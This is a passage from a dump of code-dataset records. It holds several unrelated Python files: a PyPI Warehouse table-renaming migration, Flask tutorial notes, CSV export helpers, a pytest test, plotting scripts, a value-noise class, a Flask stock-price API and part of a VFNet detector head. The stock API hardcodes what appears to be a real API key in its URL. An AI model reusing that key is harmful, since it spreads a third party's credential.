\"06bfbc92f67d\"\ndown_revision = \"e612a92c1017\"\n\n\ndef upgrade():\n # The new verbiage in Warehouse is to call these things packages, but this table\n # name was inherited from legacy PyPI.\n op.rename_table(\"packages\", \"projects\")\n op.execute(\"ALTER TABLE projects RENAME CONSTRAINT packages_pkey TO projects_pkey\")\n op.execute(\n \"\"\"\n ALTER TABLE projects\n RENAME CONSTRAINT packages_valid_name\n TO projects_valid_name\n \"\"\"\n )\n op.execute(\n \"\"\" CREATE OR REPLACE FUNCTION maintain_project_last_serial()\n RETURNS TRIGGER AS $$\n DECLARE\n targeted_name text;\n BEGIN\n IF TG_OP = 'INSERT' THEN\n targeted_name := NEW.name;\n ELSEIF TG_OP = 'UPDATE' THEN\n targeted_name := NEW.name;\n ELSIF TG_OP = 'DELETE' THEN\n targeted_name := OLD.name;\n END IF;\n\n UPDATE projects\n SET last_serial = j.last_serial\n FROM (\n SELECT max(id) as last_serial\n FROM journals\n WHERE journals.name = targeted_name\n ) as j\n WHERE projects.name = targeted_name;\n\n RETURN NULL;\n END;\n $$ LANGUAGE plpgsql;\n \"\"\"\n )\n op.execute(\n \"UPDATE row_counts SET table_name = 'projects' WHERE table_name = 'packages'\"\n )\n\n # We took the name of these tables from a failed Django port, the new names are\n # cleaner and fit the overall \"theme\" of our table names better.\n op.rename_table(\"accounts_user\", \"users\")\n op.execute(\"ALTER TABLE users RENAME CONSTRAINT accounts_user_pkey TO users_pkey\")\n op.execute(\n \"\"\"\n ALTER TABLE users\n RENAME CONSTRAINT accounts_user_username_key\n TO users_username_key\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE users\n RENAME CONSTRAINT accounts_user_valid_username\n TO users_valid_username\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE users\n RENAME CONSTRAINT packages_valid_name\n TO users_valid_username_length\n \"\"\"\n )\n op.execute(\n \"UPDATE row_counts SET table_name = 'users' WHERE table_name = 'accounts_user'\"\n )\n\n op.rename_table(\"accounts_email\", \"user_emails\")\n op.execute(\n \"\"\"\n ALTER TABLE user_emails\n RENAME CONSTRAINT accounts_email_pkey\n TO user_emails_pkey\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE user_emails\n RENAME CONSTRAINT accounts_email_email_key\n TO user_emails_email_key\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE user_emails\n RENAME CONSTRAINT accounts_email_user_id_fkey\n TO user_emails_user_id_fkey\n \"\"\"\n )\n op.execute(\"ALTER INDEX accounts_email_user_id RENAME TO user_emails_user_id\")\n\n # While the admin prefix on these tables is useful to let us know they are specific\n # to the admins, the warehouse prefix is not. All of these tables in this database\n # are for Warehouse.\n op.rename_table(\"warehouse_admin_flag\", \"admin_flags\")\n op.execute(\n \"\"\"\n ALTER TABLE admin_flags\n RENAME CONSTRAINT warehouse_admin_flag_pkey\n TO admin_flags_pkey\n \"\"\"\n )\n\n op.rename_table(\"warehouse_admin_squat\", \"admin_squats\")\n op.execute(\n \"\"\"\n ALTER TABLE admin_squats\n RENAME CONSTRAINT warehouse_admin_squat_pkey\n TO admin_squats_pkey\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE admin_squats\n RENAME CONSTRAINT warehouse_admin_squat_squattee_id_fkey\n TO admin_squats_squattee_id_fkey\n \"\"\"\n )\n op.execute(\n \"\"\"\n ALTER TABLE admin_squats\n RENAME CONSTRAINT warehouse_admin_squat_squatter_id_fkey\n TO admin_squats_squatter_id_fkey\n \"\"\"\n )\n\n\ndef downgrade():\n raise RuntimeError(\"Order No. 227 - Ни шагу назад!\")\n","repo_name":"pypi/warehouse","sub_path":"warehouse/migrations/versions/06bfbc92f67d_rename_tables.py","file_name":"06bfbc92f67d_rename_tables.py","file_ext":"py","file_size_in_byte":4850,"program_lang":"python","lang":"en","doc_type":"code","stars":3382,"dataset":"github-code","pt":"3"} +{"seq_id":"73981127441","text":"#!coding:utf-8\nfrom flask import request #上下文处的引入\nfrom flask import Flask\nfrom flask import make_response #Response对象所用到的函数的引入\nfrom flask import redirect #重定向函数的的引入\nfrom flask import abort #处理错误abort函数的引入\n\napp = Flask(__name__)\n\n#\n# @app.route('/')\n# def index():\n# user_agent = request.headers.get('User-Agent')\n# return '

Your s is %s

' % user_agent\n\n#Flask 使用上下文临时把一些对象变为了全局可访问,这里把request当作全局变量使用\n#Flask 使用上下文让特定的变量可以在一个线程中全局访问。与此同时不会干扰其它的线程,\n#Flask中又两种上下文, 程序上下文(current_app, g),以及请求上下文(request, session)。\n\n\n# @app.route('/404')\n# def indexx():\n# return \"

Bad Request

\", 404\n#如果视图函数要返回的响应使用不同的状态码,可以把数字当做第二个返回值,添加到响应文本之后。##404表示请求无效\n#视图返回的响应,还可以接受第三个参数,一个由首部(header)组成的字典,可以添加到http响应中。\n\n#Flask视图函数还可以返回Response对象,make_response()函数可以可以接受1个,2个或者3个参数(和视图的返回值一样,),并返回一个\n#Response对象,有时候需要在视图函数中进行这种转换,然后在响应对象调用各种方法,进一步设置响应。\n\n#下例创建了一个响应对象,并进行了cookie的调用设置\n\n\n@app.route('/')\ndef index():\n response = make_response('

This document carries a cookie

') #类似直接返回响应那样的写法,可以加状态码。\n response.set_cookie('answer', '42') #给response设置一个cookie,可以在浏览器里看到相对应的cookie\n return response #响应直接返回对象。\n\n#有一种名为“重定向”的特殊响应类型。这种响应没有页面文档,只告诉浏览器一个新的地址用以加载新的页面,重新定向到新的页面。经常在Web表单中使用。\n#重定向经常使用302状态码来表示,指向的地址由Location首部提供。重定向可以使用3个值的形式的返回值生成,也可以在Response中设定。\n#由于使用频繁,Flask提供了redirect()辅助函数,用于生成这种响应。例子:\n\n\n@app.route('/red')\ndef red():\n return redirect('http://www.zhihu.com') # 会直接重定向到字符串的网址中去,尚未知能否站内重定向或者重定向到错误页面去,比如404页面\n\n\n# 还有一种特殊的响应由abort生成,用于处理错误,下面这个例子中,如果URL中动态参数id对应的用户不存在,就返回状态码404\n\n\nload_user = ('lee')\n\n\n@app.route('/user/')\ndef get_userid(id):\n user = load_user(id)\n if not user:\n abort(404)\n return '

Hello %s

' % user.name # aobrt可以处理错误,不过暂时不清楚load_user的数据类型和格式没法调试成功。\n\n# 注意,abort不会把它的控制权交给调用它的函数,而是抛出异常把控制权交给Web服务器来处理。\n\n\n# app.add_url_rule('/head') #app.add_url_rule另一种定义url的语法,暂时没搞懂,搁置。!!!!\n# def head():\n# return 'hello'\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"tiancegit/flasky","sub_path":"note/testcode.py","file_name":"testcode.py","file_ext":"py","file_size_in_byte":3381,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"30532864470","text":"import csv\nimport json\n\ndef export_session_to_csv(url: str, title: str, output: list, qa_list: list, path='data/export_csvs/temp.csv') -> None:\n '''\n data is a dict with keys 'subject' and 'content'\n We want CSVs to be rectangular, i.e. each row has the same number of columns.\n We therefore first run on the data to find the maximum number of columns.\n '''\n\n max_col = 2\n for palette in output:\n for d in palette['text']:\n key = d['key']\n val = d['value']\n if isinstance(val, list):\n max_col = max(max_col, len(val[0])+1)\n if len(qa_list) > 0:\n max_col = max(max_col, 3)\n \n with open(path, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(['Title', title]+['']*(max_col-2))\n \n for i, palette in enumerate(output):\n writer.writerow(['']*(max_col)) # writer.writerow(['Entry ' + str(i+1)]+['']*(max_col-1))\n writer.writerow([palette['title']]+['']*(max_col-1))\n writer.writerow(['URL', palette['url']]+['']*(max_col-2))\n text_output = palette['text']\n if isinstance(text_output, str):\n writer.writerow(['Summary', text_output]+['']*(max_col-2))\n writer.writerow(['']*max_col)\n # in case we have a \"note\" where text_output = [{'key': '', 'value': 'note...'}], we may want to print it differently; this commented block captures it; inactive\n #elif len(text_output) == 1 and 'key' in text_output[0] and text_output[0]['key'] == '':\n # writer.writerow([text_output[0]['value']]+['']*(max_col-1))\n # writer.writerow(['']*max_col)\n else:\n for d in text_output:\n key = d['key']\n val = d['value']\n # if val is string, write it\n if isinstance(val, str):\n writer.writerow([key, val]+['']*(max_col-2))\n # if val is list, write each element\n elif isinstance(val, list):\n writer.writerow([key] + val[0] +['']*(max_col-1-len(val[0])))\n for v in val[1:]:\n writer.writerow([''] + v + ['']*(max_col-1-len(val[0])))\n\n for j, qa in enumerate(qa_list):\n question, answer = qa[0], qa[1]\n if j == 0:\n writer.writerow(['Q&A']+[question, answer] + ['']*(max_col-3))\n else:\n writer.writerow(['']+[question, answer] + ['']*(max_col-3))\n \n writer.writerow(['']*max_col)\n\n\ndef export_divider_to_csv(data: dict, path='data/export_csvs/temp.csv') -> None:\n '''\n data is a dict with keys 'subject' and 'content'.\n We want CSVs to be rectangular, i.e. each row has the same number of columns.\n We therefore first run on the data to find the maximum number of columns.\n '''\n\n max_col = 3\n for session in data['content']:\n if isinstance(session['long_summary'], str):\n continue\n for entry in session['long_summary']:\n for d in entry['text']:\n key = d['key']\n val = d['value']\n if isinstance(val, list):\n max_col = max(max_col, len(val[0])+2)\n if len(session['qa_list']) > 0:\n max_col = max(max_col, 4)\n \n with open(path, 'w', newline='') as f:\n writer = csv.writer(f)\n writer.writerow(['SUBJECT', data['subject']]+['']*(max_col-2))\n writer.writerow(['']*max_col)\n\n for i, session in enumerate(data['content']):\n writer.writerow(['Session ' + str(i+1), 'Title', session['title']]+['']*(max_col-3))\n # writer.writerow(['', 'URL', session['url']]+['']*(max_col-3))\n \n if isinstance(session['long_summary'], str):\n writer.writerow(['', 'Summary', session['long_summary']]+['']*(max_col-3))\n writer.writerow(['']*max_col)\n continue\n \n for j, palette in enumerate(session['long_summary']):\n writer.writerow(['']*max_col) # writer.writerow([''] + ['Entry ' + str(j+1)]+['']*(max_col-1))\n writer.writerow([''] + [palette['title']]+['']*(max_col-2))\n writer.writerow([''] + ['URL', palette['url']]+['']*(max_col-3))\n\n for d in palette['text']:\n key = d['key']\n val = d['value']\n \n # if val is string, write it\n if isinstance(val, str):\n writer.writerow(['', key, val]+['']*(max_col-3))\n # if val is list, write each element\n elif isinstance(val, list):\n writer.writerow(['', key] + val[0] +['']*(max_col-2-len(val[0])))\n for v in val[1:]:\n writer.writerow(['', ''] + v + ['']*(max_col-2-len(val[0])))\n\n for j, qa in enumerate(session['qa_list']):\n question, answer = qa[0], qa[1]\n if j == 0:\n writer.writerow(['', 'Q&A']+[question, answer] + ['']*(max_col-4))\n else:\n writer.writerow(['', '']+[question, answer] + ['']*(max_col-4))\n \n writer.writerow(['']*max_col)\n\n","repo_name":"bnitsan/essence_backend","sub_path":"server_src/export_utils.py","file_name":"export_utils.py","file_ext":"py","file_size_in_byte":5441,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29028745597","text":"import pytest\nimport uuid\n\nfrom unittest.mock import patch\n\nfrom intranet.femida.src.candidates.bulk_upload.choices import CANDIDATE_UPLOAD_MODES\nfrom intranet.femida.src.candidates.tasks import upload_from_beamery_task\n\nfrom intranet.femida.tests import factories as f\nfrom intranet.femida.tests.utils import ContainsDict\n\n\n# Используем заготовленный словарь, чтобы тесты были предсказуемыми\nBEAMERY_IDS = {\n 'known': str(uuid.uuid4()),\n 'unknown': str(uuid.uuid4()),\n}\n\n\n@pytest.mark.parametrize('beamery_id, femida_id, expected_original, expected_mode', (\n # Создание нового кандидата через Бимери. Указан неизвестный beamery id, femida id отсутствует\n pytest.param('unknown', None, None, CANDIDATE_UPLOAD_MODES.create, id='create'),\n # Изменение существующего кандидата через Бимери. Бимери уже знает femida id\n pytest.param('unknown', 100500, 100500, CANDIDATE_UPLOAD_MODES.merge, id='merge'),\n # Изменение существующего кандидата через Бимери. Бимери ещё не знает femida id.\n # Например, если после создания кандидата на стороне Бимери\n # его отредактировали до того, как Фемида прислала ответное сообщение со своим id.\n pytest.param('known', None, 100500, CANDIDATE_UPLOAD_MODES.merge, id='merge-by-beamery-id'),\n))\n@patch('intranet.femida.src.candidates.bulk_upload.uploaders.CandidateBeameryUploader')\ndef test_upload_from_beamery_task(mocked_uploader, beamery_id, femida_id,\n expected_original, expected_mode):\n f.CandidateFactory(id=100500, beamery_id=BEAMERY_IDS['known'])\n beamery_id = BEAMERY_IDS[beamery_id]\n raw_data = {\n 'id': beamery_id,\n 'integrations': {\n 'brassring': {'id': femida_id},\n },\n }\n expected_serialized_data = {\n 'beamery_id': beamery_id,\n 'original': expected_original,\n }\n\n upload_from_beamery_task(data=[raw_data])\n\n mocked_uploader.assert_called_once_with(expected_mode, [ContainsDict(expected_serialized_data)])\n mocked_uploader().upload.assert_called_once_with()\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"Intranet/tests/unit/candidates/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2386,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23768219345","text":"from matplotlib import pyplot as plt\nimport numpy as np\n\nsistole = np.array([110, 120, 115, 100, 130])\ndiastole = np.array([70, 80, 75, 65, 90])\n\ntitleFont = {\"family\": \"serif\", \"color\": \"blue\", \"size\": 15}\nlabelFont = {\"family\": \"serif\", \"color\": \"orange\", \"size\": 8}\n\nplt.plot(sistole, \"D-r\", lw = \"1.5\")\nplt.plot(diastole, \"D-b\", lw = \"1\")\n\nplt.ylabel(\"Diastole / Sistole\", fontdict=labelFont)\nplt.xlabel(\"Blood Pressure Sample\", fontdict=labelFont)\n\nplt.title(\"Last 5 Blood Pressure Samples\", fontdict=titleFont, loc=\"right\")\n\nplt.grid() # Display all grid lines\nplt.show()","repo_name":"salvadororjuela/ScintificComputingWithPython","sub_path":"py4e/l18Matplotlib/9.0gridLines.py","file_name":"9.0gridLines.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43312527236","text":"import sys\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport os\nimport subprocess\nfrom scipy.stats import t\n\ndef calcConfInt(p):\n mean,var,size = np.mean(p),np.var(p),len(p)\n alpha = 0.01\n df = size - 1\n unbiased_sd = math.sqrt((size/df)*var)\n t_variate = t.ppf(1-alpha/2,df)\n uppervalue = mean + t_variate * unbiased_sd/math.sqrt(size)\n return uppervalue\n\n\nalgorithmsLabels = [\"EE\",\"PCC-EE\",\"PCC\",\"SQF\"];\nsuffix_file_list = ['nonholo','holo']\nrad = [0.4,0.5,0.6,0.7,0.8,0.9,1.0]\nlogLines = 13+1\n# list to ignore when plot not allowed log graph.\nignoreLabels = []\n\nalgorithmsDict = {}\nalgorithmsSymbolDict = {}\nprefixNumDict = {}\n\nsuffix_file = 'nonholo'\nalgorithmsDict[suffix_file] = ['../target_ee','../target_pcc-ee','../target_pcc','../target_topdown_influence']\nalgorithmsSymbolDict[suffix_file] = [\".\"]*len(algorithmsLabels)\nprefixNumDict[suffix_file] = ['rad']*len(algorithmsLabels)\n\nsuffix_file = 'holo'\nalgorithmsDict[suffix_file] = ['../target_holonomic_ee','../target_holonomic_pcc-ee','../target_holonomic_pcc','../target_holonomic_topdown_influence']\nalgorithmsSymbolDict[suffix_file] = [\".\"]*len(algorithmsLabels)\nprefixNumDict[suffix_file] = ['rad']*len(algorithmsLabels)\n\nksamples = 40\nnSamples = np.full((len(rad),len(algorithmsLabels),len(suffix_file_list)), ksamples)\ndata = np.zeros((len(rad),len(algorithmsLabels),ksamples,logLines,len(suffix_file_list)));\ndataMean = np.zeros((len(rad),len(algorithmsLabels),logLines,len(suffix_file_list)));\ndataUpCi = np.zeros((len(rad),len(algorithmsLabels),logLines,len(suffix_file_list)));\nnNotAllowed = np.zeros((len(rad),len(algorithmsLabels),len(suffix_file_list)))\n\n#Count how many logs has maximum allowed time\nfor i_sf, suffix_file in enumerate(suffix_file_list):\n algorithms = algorithmsDict[suffix_file] \n prefixNum = prefixNumDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n for n in range(len(rad)):\n algorithm = algorithms[a];\n for s in range(nSamples[n,a,i_sf]):\n dataFile = open(algorithm+\"/\"+prefixNum[a]+('%.1f' % rad[n])+\"/log_\"+str(s));\n dataFileStr = dataFile.readlines();\n if int(dataFileStr[10]) >= 20*60*1000000:\n nNotAllowed[n,a,i_sf] += 1;\n\nprintNumberLogs = False\n\n\ndef plotBar(i,W,N,Xms,Ys,my_label):\n '''\n Plot the i-th bars for a alternate bars graph.\n i: i-th bar to plot;\n W: width of all bars together;\n N: total number of bars;\n Xms: middle x-axis coordinate of all bars together;\n Ys: list of y-axis coordinate values of the i-th bar;\n my_label: the label for the i-th bar.\n '''\n pos = [Xm + (W*(2*i-N+1))/(2*N) for Xm in Xms]\n plt.bar(pos,Ys,width=W/N,label=my_label)\n\ndef plotNumber(i,W,N,Xms,Ys):\n '''\n Plot the number in Ys as text above the i-th bar.\n i: i-th bar to plot;\n W: width of all bars together;\n N: total number of bars;\n Xms: middle x-axis coordinate of all bars together;\n Ys: list of y-axis coordinate values of the i-th bar;\n '''\n pos = [Xm + W*(2*i-N+1)/(2*N) for Xm in Xms]\n for i in range(len(Ys)):\n plt.annotate(str(int(Ys[i])),(pos[i],Ys[i]),ha='center')\n\nplt.rcParams.update({'font.size': 15})\n\ndef imgAllowed():\n #Save a figure showing the number of logs with maximum allowed time\n for i_sf, suffix_file in enumerate(suffix_file_list):\n for a in range(len(algorithmsLabels)):\n if not (algorithmsLabels[a] in ignoreLabels):\n plotBar(a,(1-0.10)*0.1,len(algorithmsLabels),rad,nNotAllowed[:len(rad),a,i_sf],algorithmsLabels[a])\n if printNumberLogs:\n plotNumber(a,(1-0.10)*0.1,len(algorithmsLabels),rad,nNotAllowed[:len(rad),a,i_sf])\n plt.xticks(rad)\n if len(algorithmsLabels) > 1:\n plt.legend(loc='center right');\n plt.ylabel(\"Number of fails\");\n plt.xlabel(\"Radius of target area\");\n plt.savefig(\"FigureNotAllowedLogs\"+suffix_file+\".png\",bbox_inches=\"tight\");\n plt.savefig(\"FigureNotAllowedLogs\"+suffix_file+\".pdf\",bbox_inches=\"tight\");\n plt.clf();\n \n\nfor i_sf, suffix_file in enumerate(suffix_file_list):\n algorithms = algorithmsDict[suffix_file] \n prefixNum = prefixNumDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n for n in range(len(rad)):\n algorithm = algorithms[a];\n index_list = []\n for s in range(nSamples[n,a,i_sf]):\n dataFile = open(algorithm+\"/\"+prefixNum[a]+('%.1f' % rad[n])+\"/log_\"+str(s));\n dataFileStr = dataFile.readlines();\n if int(dataFileStr[10]) >= 20*60*1000000: continue\n index_list.append(s)\n for fileline in range(logLines):\n if fileline == 13:\n FirstRobotReachingTimeline = 8 \n LastRobotReachingTimeline = 9\n # number of robots is 100\n data[n,a,s,fileline,i_sf] = 99/((float(dataFileStr[LastRobotReachingTimeline]) - float(dataFileStr[FirstRobotReachingTimeline]))/1e6);\n elif fileline in [11,12]:\n data[n,a,s,fileline,i_sf] = float(dataFileStr[fileline]);\n elif fileline in [8,9,10]:\n data[n,a,s,fileline,i_sf] = float(dataFileStr[fileline])/1e6;\n else:\n data[n, a, s, fileline,i_sf] = int(dataFileStr[fileline]);\n if index_list != []:\n for fileline in range(logLines):\n tmp_data = [data[n,a,s,fileline,i_sf] for s in index_list]\n dataMean[n,a,fileline,i_sf] = np.mean(tmp_data);\n if all(dataMean[n,a,fileline,i_sf] == rest for rest in tmp_data):\n dataUpCi[n,a,fileline,i_sf] = dataMean[n,a,fileline,i_sf]\n else:\n dataUpCi[n,a,fileline,i_sf] = calcConfInt(tmp_data);\n\ndef main(fileline):\n for i_sf, suffix_file in enumerate(suffix_file_list):\n algorithmsSymbol = algorithmsSymbolDict[suffix_file] \n for a in range(len(algorithmsLabels)):\n allowedRad = []\n for n in range(len(rad)):\n if nSamples[n,a,i_sf] - nNotAllowed[n,a,i_sf] > 1:\n allowedRad.append(n)\n if allowedRad != []:\n tmpRad = [rad[i] for i in allowedRad]\n tmpDataMean = [dataMean[n,a,fileline,i_sf] for n in allowedRad]\n tmpyErr = [dataUpCi[n,a,fileline,i_sf] - dataMean[n,a,fileline,i_sf] for n in allowedRad]\n plt.errorbar(tmpRad,tmpDataMean, yerr=tmpyErr, label=algorithmsLabels[a],marker=algorithmsSymbol[a],capsize=5,linestyle='solid' if algorithmsLabels[a] != 'SQF' else 'dashed');\n if printNumberLogs:\n valuesStr = [str(int(nSamples[n,a,i_sf] - nNotAllowed[n,a,i_sf])) for n in allowedRad]\n for i in range(len(valuesStr)):\n plt.annotate(valuesStr[i],(tmpRad[i],tmpDataMean[i]))\n if len(algorithmsLabels) > 1:\n plt.legend(loc=0);\n plt.xlabel(\"Radius of target area (m)\");\n list_line_ylabel = [ \n # Label # index\n #----------------------------------------------------------#------\n \"Total number of iterations\", # 0\n \"Total iterations of the last robot\", # 1\n \"Number of messages\", # 2\n \"Summation of the iter. for reaching\", # 3\n \"Summation of the iter. for exiting\", # 4\n \"Last robot's iterations for reaching\", # 5\n \"Last robot's iterations for exiting\", # 6\n \"Stalls\", # 7\n \"First robot's reaching time (s)\", # 8\n \"Last robot's reaching time (s)\", # 9\n \"Total time of the simulation (s)\", # 10\n \"Minimum distance (m)\", # 11\n \"Maximum velocity (m/s)\", # 12\n \"Throughput (1/s)\" # 13\n ]\n plt.ylabel(list_line_ylabel[fileline])\n plt.savefig(\"FigureRad\"+str(fileline)+suffix_file+\".png\",bbox_inches=\"tight\");\n plt.savefig(\"FigureRad\"+str(fileline)+suffix_file+\".pdf\",bbox_inches=\"tight\");\n plt.clf();\n\n\n\nimgAllowed()\nmain(9)\n# ~ main(10)\n","repo_name":"yuri-tavares/swarm-common-target-area-congestion","sub_path":"common/analyseRad.py","file_name":"analyseRad.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"21837361466","text":"from numbers import Number\nfrom collections import Sequence\nimport random\nimport math\n\ndef c_mul(a, b):\n return eval(hex((int(a) * b) & 0xFFFFFFFF)[:-1])\ndef hashtuplesafe(tup):\n value = 0x345678\n for item in tup:\n value = c_mul(1000003, value) ^ hash(item)\n value = value ^ len(tup)\n if value == -1:\n value = -2\n return value\ndef replwfunc(o):\n if isinstance(o, Number):\n cache = o\n o = lambda i: cache\n elif isinstance(o, Sequence):\n o = o.__getitem__\n return o\n#------------------------------------------------------------------------------ \n# Method 2 from http://lodev.org/cgtutor/randomnoise.html\nclass ValueNoise:\n \"\"\"\n frequency - A smaller number generates a more \"zoomed-in\" terrain with fewer details\n octaves - Smaller number generates more lakes, 0.4 and 10 gives a good result if 320*240 in 2 seconds\n \"\"\"\n def __init__(self, frequency=0.4, amplitude=1, octaves=10.0, seed=0):\n self.frequency = replwfunc(frequency)\n self.amplitude = replwfunc(amplitude)\n self.octaves = octaves\n self.seed = seed\n self.random = random.Random()\n self.noisemap = {}\n self.resultmap = {}\n self.xycmap = {}\n def noise(self, x, y):\n key = (x, y, self.seed)\n noise = self.noisemap\n if key not in noise:\n random.seed(hashtuplesafe((hashtuplesafe(key), hashtuplesafe(key))))\n random.seed(random.randint(0, 0xFFFFFFFF))\n noise[key] = random.randint(0, 1000) / 1000\n return noise[key]\n def smooth_noise(self, x, y):\n \"\"\"Returns the average value of the 4 neighbors of (x, y) from the\n noise array.\"\"\"\n\n fractX = x - int(x)\n fractY = y - int(y)\n\n x1 = int(x)\n y1 = int(y)\n\n x2 = x1 - 1\n y2 = y1 - 1\n\n #Bilinear interpolation http://en.wikipedia.org/wiki/Bilinear_interpolation\n value = 0.0\n value += fractX * fractY * self.noise(y1, x1)\n value += fractX * (1 - fractY) * self.noise(y2, x1)\n value += (1 - fractX) * fractY * self.noise(y1, x2)\n value += (1 - fractX) * (1 - fractY) * self.noise(y2, x2)\n\n return value\n def generate(self, x, y):\n \"\"\"\n Generate dat value noise, boi\n \"\"\"\n\n key = (x, y, self.seed)\n\n result = self.resultmap\n if key not in result:\n result[key] = 128 * sum(self.smooth_noise(x*self.frequency(n), y*self.frequency(n))*self.amplitude(n) for n in range(self.octaves)) / self.octaves\n\n return (result[key],)\n\n__all__ = [\"ValueNoise\"]\n","repo_name":"postcursor-laboratories/ConWorld","sub_path":"map/value.py","file_name":"value.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"18687261175","text":"import json\nimport urllib.request\nimport objectpath\n\n### To access data points\nfrom flask import Flask\nfrom flask_restful import Api, Resource, reqparse\n\nintervals = ['1', '5', '15', '30', '60']\n\nclass Data(Resource):\n def get(selt, symbol, interval):\n if interval in intervals:\n return get_stock_prices_by_symbol(symbol, interval), 200\n else:\n return 'No this interval.'\n\n# def get_interval(interval):\n# return interval\n\ndef create_url(symbol, interval):\n return 'https://www.alphavantage.co/query?function=TIME_SERIES_INTRADAY&symbol=' + symbol + '&interval=' + interval + 'min&apikey=D01PQMVRIUNEQYRW'\n\ndef _request(symbol, interval):\n with urllib.request.urlopen(create_url(symbol, interval)) as req:\n data = req.read().decode(\"UTF-8\")\n return data\n\ndef get_stock_prices_by_symbol(symbol, interval):\n c = json.loads(_request(symbol, interval))['Time Series ('+ interval +'min)']\n json.dumps(c)\n\n ## 1. open values\n tree = objectpath.Tree(c)\n result = tree.execute(\"$..'1. open'\")\n values = list()\n for i in result:\n values.append(i)\n\n ### time\n times = list()\n for i in c:\n times.append(i)\n\n ### data\n data_points = []\n data_points_len = len(times)\n idx = 0\n while idx != data_points_len:\n data_points.append({\"time\": times[idx],\"value\": float(values[idx])})\n idx = idx + 1\n\n return data_points\n\n# print(Data_points)\n#### To access data points\napp = Flask(__name__)\napi = Api(app)\n\napi.add_resource(Data, \"/api/data//\")\napp.run(debug=True)\n","repo_name":"bartekwichowski/visual-app","sub_path":"backend/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"34824907514","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nfrom mmcv.cnn import ConvModule, Scale, bias_init_with_prob, normal_init\nfrom mmcv.ops import DeformConv2d\nfrom mmcv.runner import force_fp32\nimport torch.nn.functional as F\nfrom mmdet.core import (bbox2distance, bbox_overlaps, build_anchor_generator,\n build_assigner, build_sampler, distance2bbox,\n multi_apply, multiclass_nms, reduce_mean)\nfrom ..builder import HEADS, build_loss\nfrom .atss_head import ATSSHead\nfrom .fcos_head import FCOSHead\nfrom .paa_atss_head import PAA_ATSSHead\ntry:\n import sklearn.mixture as skm\nexcept ImportError:\n skm = None\n\nINF = 1e8\n\ndef levels_to_images(mlvl_tensor):\n \"\"\"Concat multi-level feature maps by image.\n [feature_level0, feature_level1...] -> [feature_image0, feature_image1...]\n Convert the shape of each element in mlvl_tensor from (N, C, H, W) to\n (N, H*W , C), then split the element to N elements with shape (H*W, C), and\n concat elements in same image of all level along first dimension.\n Args:\n mlvl_tensor (list[torch.Tensor]): list of Tensor which collect from\n corresponding level. Each element is of shape (N, C, H, W)\n Returns:\n list[torch.Tensor]: A list that contains N tensors and each tensor is\n of shape (num_elements, C)\n \"\"\"\n batch_size = mlvl_tensor[0].size(0)\n batch_list = [[] for _ in range(batch_size)]\n channels = mlvl_tensor[0].size(1)\n for t in mlvl_tensor:\n t = t.permute(0, 2, 3, 1)\n t = t.view(batch_size, -1, channels).contiguous()\n for img in range(batch_size):\n batch_list[img].append(t[img])\n return [torch.cat(item, 0) for item in batch_list]\n\n@HEADS.register_module()\nclass VFocalPAAHead(PAA_ATSSHead, ATSSHead, FCOSHead):\n \"\"\"Head of `VarifocalNet (VFNet): An IoU-aware Dense Object\n Detector.`_.\n The VFNet predicts IoU-aware classification scores which mix the\n object presence confidence and object localization accuracy as the\n detection score. It is built on the FCOS architecture and uses ATSS\n for defining positive/negative training examples. The VFNet is trained\n with Varifocal Loss and empolys star-shaped deformable convolution to\n extract features for a bbox.\n Args:\n num_classes (int): Number of categories excluding the background\n category.\n in_channels (int): Number of channels in the input feature map.\n regress_ranges (tuple[tuple[int, int]]): Regress range of multiple\n level points.\n center_sampling (bool): If true, use center sampling. Default: False.\n center_sample_radius (float): Radius of center sampling. Default: 1.5.\n sync_num_pos (bool): If true, synchronize the number of positive\n examples across GPUs. Default: True\n gradient_mul (float): The multiplier to gradients from bbox refinement\n and recognition. Default: 0.1.\n bbox_norm_type (str): The bbox normalization type, 'reg_denom' or\n 'stride'. Default: reg_denom\n loss_cls_fl (dict): Config of focal loss.\n use_vfl (bool): If true, use varifocal loss for training.\n Default: True.\n loss_cls (dict): Config of varifocal loss.\n loss_bbox (dict): Config of localization loss, GIoU Loss.\n loss_bbox (dict): Config of localization refinement loss, GIoU Loss.\n norm_cfg (dict): dictionary to construct and config norm layer.\n Default: norm_cfg=dict(type='GN', num_groups=32,\n requires_grad=True).\n use_atss (bool): If true, use ATSS to define positive/negative\n examples. Default: True.\n anchor_generator (dict): Config of anchor generator for ATSS.\n Example:\n >>> self = VFNetHead(11, 7)\n >>> feats = [torch.rand(1, 7, s, s) for s in [4, 8, 16, 32, 64]]\n >>> cls_score, bbox_pred, bbox_pred_refine= self.forward(feats)\n >>> assert len(cls_score) == len(self.scales)\n \"\"\" # noqa: E501\n\n def __init__(self,\n num_classes,\n in_channels,\n regress_ranges=((-1, 64), (64, 128), (128, 256), (256, 512),\n (512, INF)),\n center_sampling=False,\n center_sample_radius=1.5,\n sync_num_pos=True,\n gradient_mul=0.1,\n topk=9,\n 